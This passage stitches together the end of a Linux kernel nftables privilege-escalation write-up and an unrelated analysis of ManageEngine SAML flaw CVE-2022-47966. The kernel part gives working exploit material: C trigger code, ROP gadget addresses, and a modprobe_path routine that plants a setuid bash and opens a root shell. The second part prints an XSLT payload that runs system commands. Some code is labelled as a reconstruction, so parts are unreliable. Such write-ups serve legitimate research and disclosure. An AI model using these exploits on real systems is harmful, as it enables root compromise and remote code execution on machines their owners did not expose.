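        if (unshare(CLONE_NEWTIME) != 0) exit(1);
        pause();             // hold the namespace reference until cleanup
        exit(0);
    }
    return pid;              // kill + reap later to release the namespace
}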
RIP Control
The delete member of the nft_set ops function table is executed when an item has to be removed from the set. The item removal can be done from a rule that removes an element from a set when certain criteria are matched. Using the nft command-line tool, such a rule can be created as sketched below.
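The original nft listing is not reproduced here; a hedged reconstruction matching the description below (the table and chain names are illustrative) would be:
$ nft add table ip testtable
$ nft 'add chain ip testtable testchain { type filter hook input priority 0; policy accept; }'
$ nft 'add set ip testtable my_set { type ipv4_addr; }'
$ nft add element ip testtable my_set '{ 127.0.0.1 }'
$ nft add rule ip testtable testchain ip saddr 127.0.0.1 delete @my_set '{ ip saddr }'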
The snippet above shows the creation of a table, a chain, and a set that contains elements of type ipv4_addr (i.e., IPv4 addresses). Then a rule is added, which deletes the item 127.0.0.1 from the set my_set when an incoming packet has the source IPv4 address 127.0.0.1. Whenever a packet matching those criteria is processed via nftables, the delete function pointer of the specified set is called.
Therefore, RIP control can be achieved with the following steps. Consider the target set to be the nft_set object whose address was already obtained.
Add a rule to the table being used for exploitation in which an item is removed from the target set when the source IP of incoming packets is 127.0.0.1.
Partially free the nft_set object whose address was obtained.
Spray System V messages containing a partially faked nft_set object with a fake ops table, with a chosen value for the ops->delete member.
Trigger the call of nft_set->ops->delete by locally sending a network packet to 127.0.0.1. This can be done by simply opening a TCP socket to 127.0.0.1 on any port and issuing a connect() call.
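The last step is trivial to perform from the exploit process itself; a minimal sketch:
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

// Any locally generated packet to 127.0.0.1 traverses the input hook, matches
// the rule, and reaches the (now attacker-controlled) nft_set->ops->delete.
static void trigger_delete(unsigned short port) {
    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(port) };
    inet_pton(AF_INET, "127.0.0.1", &sa.sin_addr);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));  // the SYN alone suffices
    close(s);
}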
Escalating Privileges
Once control of the RIP register is achieved, and thus code execution can be redirected, the last step is to escalate the privileges of the current process and drop to an interactive shell with root privileges.
A way of achieving this is as follows:
Pivot the stack to a memory area under our control. When the delete function is called, the RSI register contains the address of the memory region where the nftables register values are stored. The values of these registers can be controlled by adding an immediate expression to the rule created to achieve RIP control.
Afterwards, since the nftables register memory area is not big enough to fit a ROP chain that overwrites the MODPROBE_PATH global variable, the stack is pivoted again to the end of the fake nft_set object.
The stack pivot gadgets and ROP chain used can be found below.
// ROP gadget to pivot the stack to the nftables registers memory area
0xffffffff8169361f: push rsi ; add byte [rbp+0x310775C0], al ; rcr byte [rbx+0x5D], 0x41 ; pop rsp ; ret ;
// ROP gadget to pivot the stack to the memory allocation holding the target nft_set
0xffffffff810b08f1: pop rsp ; ret ;
When the execution flow is redirected, the RSI register contains the address of the nftables registers memory area. This memory can be controlled and is thus used as a temporary stack, given that the area is not big enough to hold the entire ROP chain. Afterwards, using the second gadget shown above, the stack is pivoted towards the end of the fake nft_set object.
// ROP chain used to overwrite the MODPROBE_PATH global variable
0xffffffff8148606b: pop rax ; ret ;
0xffffffff8120f2fc: pop rdx ; ret ;
0xffffffff8132ab39: mov qword [rax], rdx ; ret ;
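For completeness, here is a hedged sketch of the classic userland side of the modprobe_path technique once the chain above has run; the paths are illustrative.
#include <stdlib.h>

// Assumes the ROP chain overwrote modprobe_path with "/tmp/x". Executing a
// file with an unknown magic makes the kernel run modprobe_path as root.
static void modprobe_escalate(void) {
    system("printf '#!/bin/sh\\nchmod u+s /bin/bash\\n' > /tmp/x && chmod +x /tmp/x");
    system("printf '\\377\\377\\377\\377' > /tmp/trigger && chmod +x /tmp/trigger");
    system("/tmp/trigger 2>/dev/null");  // fails, but fires request_module()
    system("/bin/bash -p");              // root shell via the setuid bash
}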
It is important to mention that the stack pivoting gadget used here performs memory dereferences, which requires the dereferenced address to be mapped. While in our experiments the address was usually mapped, this requirement negatively impacts the exploit's reliability.
Wrapping Up
We hope you enjoyed this read and learned something new. If you are hungry for more, make sure to check out our other blog posts.
We wish y'all great Christmas holidays and a happy New Year! Here's to a 2023 with more bugs, exploits, and write-ups!
On January 10, 2023, ManageEngine released a security advisory for CVE-2022-47966 (discovered by Khoadha of Viettel Cyber Security) affecting a wide range of products. The vulnerability allows an attacker to gain remote code execution by issuing an HTTP POST request containing a malicious SAML response. This vulnerability is a result of using an outdated version of Apache Santuario for XML signature validation.
Patch Analysis
We started our initial research by examining the differences between ServiceDesk Plus version 14003 and version 14004. By default, ServiceDesk is installed into C:\Program Files\ManageEngine\ServiceDesk. We installed both versions and extracted the jar files for comparison.
While many jar files have been updated, we noticed that a single jar file had been completely replaced: libxmlsec from Apache Santuario was updated from 1.4.1 to 2.2.3. Version 1.4.1 is over a decade old.
Jar differences
That is a large version jump, but if we start with the 1.4.2 release notes we find an interesting change:
Switch order of XML Signature validation steps. See Issue 44629.
Issue 44629 can be found here. It describes switching the order of XML signature validation steps and the security implications.
XML Signature Validation
XML signature validation is a complex beast, but it can be simplified down to the following two steps:
Reference Validation – validate that each <Reference> element within the <SignedInfo> element has a valid digest value.
Signature Validation – cryptographically validate the <SignedInfo> element. This assures that the <SignedInfo> element has not been tampered with.
While the official XML signature validation spec lists reference validation followed by signature validation, these two steps can be performed in either order. Since the reference validation step can involve processing attacker-controlled XML Transforms, one should always perform the signature validation step first to ensure that the transforms came from a trusted source.
SAML Information Flow Refresher
Applications that support single sign-on typically use an authorization solution like SAML. When a user logs into a remote service, that service forwards the authentication request to the SAML Identity Provider. The SAML Identity Provider will then validate that the user credentials are correct and that they are authorized to access the specified service. The Identity Provider then returns a response to the client which is forwarded to the Service Provider.
The information flow of a login request via SAML can be seen below. One of the critical pieces is understanding that the information flow uses the client's browser to relay all information between the Service Provider (SP) and the Identity Provider (IDP). In this attack, we send a request containing malicious SAML XML directly to the service provider's Assertion Consumer Service (ACS) URL.
Information flow via https://cloudsundial.com/
The Vulnerability
Vulnerability Ingredient 1: SAML Validation Order
Understanding that the SAML information flow allows an attacker to introduce or modify the SAML data in transit, it should now be clear why the Apache Santuario update to perform signature validation before reference validation was so important. This vulnerability abuses the verification order as the first step in exploitation. See below for the diff between v1.4.1 and v1.4.2.
1.4.1 vs 1.4.2
In v1.4.1, reference validation happened near the top of the code block with the call to si.verify(). In v1.4.2, the call to si.verify() was moved to the end of the function, after the signature verification in sa.verify(sigBytes).
Vulnerability Ingredient 2: XSLT Injection
Furthermore, each
<Reference>
element can contain a
<Transform>
element responsible for describing how to modify an element before calculating its digest. Transforms allow for arbitrarily complex operations through the use of XSL Transformations (XSLT).
XSLT is a turing-complete language and, in the ManageEngine environment, it is capable of executing arbitrary Java code. We can supply the following snippet to execute an arbitrary system command:
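The exact payload from the post is not reproduced here, but a representative Xalan-style transform that reaches java.lang.Runtime looks like the following (the command to run is illustrative):
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
  <!-- Xalan's java namespace maps XSLT function calls onto Java methods -->
  <xsl:template match="/">
    <xsl:value-of select="rt:exec(rt:getRuntime(), 'notepad.exe')"/>
  </xsl:template>
</xsl:stylesheet>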
By abusing the order of SAML validation in Apache Santuario v1.4.1 and the access to arbitrary Java classes that Java's XSLT library provides, we can exploit this vulnerability in ManageEngine products to gain remote code execution.
SAML SSO Configuration
Security Assertion Markup Language (SAML) is a specification for sharing authentication and authorization information between an application or service provider and an identity provider. SAML with single sign-on means users don't have to worry about maintaining credentials for all of the apps they use, and it gives IT administrators a centralized location for user management.
SAML uses XML signature verification to ensure the secure transfer of messages passed between service providers and identity providers.
We can enable SAML SSO by navigating to Admin -> Users & Permissions -> SAML Single Sign On, where we can enter our identity provider information. Once properly configured, we will see "Log in with SAML Single Sign On" on the logon page:
Since ServiceDesk runs as a service, there is no desktop on which to display the notepad.exe GUI, so we use Process Explorer to check the success of the exploit.
Notepad running
This proof of concept was also tested against Endpoint Central, and we expect it to work unmodified on many of the ManageEngine products that share some of their codebase with ServiceDesk Plus or Endpoint Central.
Notably, the AD-related products (AdManager, etc.) have additional checks on the SAML responses that must pass: they verify that the SAML response looks like it came from the expected identity provider. Our POC has an optional --issuer argument to provide the information to use for the <Issuer> element. Additionally, the AD-related products have a different SAML logon endpoint URL that contains a GUID. How to determine this information in an automated fashion is left as an exercise for the reader.
In summary, when Apache Santuario is <= v1.4.1, the vulnerability is trivially exploitable and made possible via several conditions:
Reference validation is performed before signature validation, allowing for the execution of malicious XSLT transforms.
Execution of XSLT transforms allows an attacker to execute arbitrary Java code.
This vulnerability is still exploitable even when Apache Santuario is between v1.4.1 and v2.2.3, which some of the affected ManageEngine products were using at the time (Password Manager Pro, for example). The original researcher, Khoadha, documents further bypasses of validation in their research, which is definitely worth a read.